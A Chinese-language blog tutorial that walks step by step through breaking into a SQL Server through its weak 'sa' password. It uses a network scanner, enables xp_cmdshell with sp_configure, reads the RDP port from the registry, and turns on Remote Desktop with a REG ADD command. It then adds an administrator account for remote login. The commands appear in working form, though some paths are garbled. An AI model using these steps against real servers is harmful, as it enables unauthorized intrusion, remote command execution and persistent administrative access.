1、使用 SQL弱口令入侵 SQL服务器使用的工具:扫描工具 X-scanSQL查询分析器SQLtools命令集成版环境:Windows xp 和 Windows Server 2003企业版1、在网络内扫描到一台 SQL Server服务器,且 sa密码为弱口令 1232、通过 SQLtools 命令集成版这个软件,我们可以连上这台 SQL Server服务器,如下图所示3、虽然我们能 succeed连接到 SQL Server服务器,但是在我们执行 dir c:查看 c盘文件时候,可能会报错,基于这种情况,我们可以使用 SQL 查询分析器,修正该错误信息4、打开 SQL Server查询分析器
2、,输入 IP地址和 sa帐号及密码5、在查询分析器里输入 SQL语句,并执行SQL语句:;EXEC sp_configure show advanced options, 1 - ;RECONFIGURE WITH OVERRIDE - ;EXEC sp_configure xp_cmdshell, 1 - ;RECONFIGURE WITH OVERRIDE - ;EXEC sp_configure show advanced options, 0 - 6、这时,我们在执行 dir c:命令查看 c盘下的文件,查询成功7、在 SQLtools工具的 dos命令窗口,执行 netstat -a
3、n查看 3389端口是否打开8、同时使用 SQL命令需要查询默认的 3389端口是否已经被更改SQl命令查询 3389端口是否被更改:exec xp_regread HKEY_LOCAL_MACHINE,SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp,PortNumber9、很显然,默认 3389端口没有被修改,那么我们就可以执行 dos命令,开启 SQL Server服务器的3389端口DOS命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal“ “Serve
4、r /v fDenyTSConnections /t REG_DWORD /d 0 /f10、再次查询 SQl Server的 3389端口是否已经打开(很明显我们已经成功开启对方的 3389端口)11、这时我们可以使用我们熟悉的 dos命令对该 SQL Server服务器新建用户,并加入到Administrators组12、现在,我们就可以是用远程桌面连接这台 SQL Server服务器了备注:一:现在的 SQL Server服务器弱口令,个人感觉扫描到的几率微乎其微二:如果对方没开启远程桌面,那么即使建立了自己的帐号,岂不也只能望而兴叹三:如果对方开启了远程桌面,但是设置了 IPsec策略,仅运行特定的 IP段或 IP地址访问,那么.本文出自 “Darren-pan” 博客, http:/
